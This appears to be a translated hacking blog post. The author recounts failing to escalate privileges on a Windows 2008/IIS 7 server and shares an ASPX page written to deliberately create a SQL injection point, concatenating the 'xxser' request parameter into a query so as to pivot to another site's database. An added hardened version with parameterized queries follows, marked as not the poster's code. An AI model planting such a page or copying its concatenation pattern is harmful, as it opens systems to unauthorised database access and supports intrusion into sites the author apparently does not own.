Yesterday 4z1 and I were looking at a site where privilege escalation was really hard. We stared at it for a full 5 hours with no result. Windows 2008 + IIS 7, no sa, no root, no services of any kind...
In the process I needed an ASPX page that constructs an injection point in order to get across to another site. I found a pile of code online and not one piece of it worked.
It is not much code, so I just wrote my own. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影 ASPX constructed-injection page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
        <script language="c#" runat="server">
            void Page_Init(object sender, EventArgs e)
            {
                System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
                // "连接名" is the name of a connectionStrings entry in web.config
                conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
                conn.Open();

                string i = this.Page.Request.Params["xxser"]; // the parameter comes from ?xxser=1
                // Deliberately concatenated: the raw value of xxser lands unquoted inside the query,
                // which is the injection point this page exists to provide.
                System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名 = " + i, conn);
                int x = command.ExecuteNonQuery(); // returns -1 for a SELECT; the query still executes and errors still surface
                Response.Write(i + "\n");
                Response.Write(x);
                conn.Close();
            }
        </script>
    </div>
    </form>
</body>
</html>
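For contrast, the hardened counterpart of the page above, as an added example that is not the poster's code: the same lookup with a typed SqlParameter instead of string concatenation, an integer check on `xxser`, and HTML-encoding before the value is echoed. It assumes the same `连接名`, `[表]` and `列名` placeholders and that the column is numeric.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<script runat="server">
    // Hardened version (added example, not the original poster's code).
    // The SQL text is fixed; the request value travels as a typed parameter,
    // so the database never parses it as part of the statement.
    void Page_Load(object sender, EventArgs e)
    {
        string raw = Request.Params["xxser"];
        int id;
        // The column is numeric, so anything that is not an integer is rejected up front.
        if (!int.TryParse(raw, out id))
        {
            Response.StatusCode = 400;
            Response.Write("bad parameter");
            return;
        }

        // "连接名" is the connectionStrings entry name, as in the original page (placeholder).
        string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand("select count(*) from [表] where 列名 = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            int rows = (int)cmd.ExecuteScalar(); // ExecuteScalar returns the single count value

            // Encode before reflecting user input into the response.
            Response.Write(Server.HtmlEncode(raw) + "\n");
            Response.Write(rows);
        }
    }
</script>
```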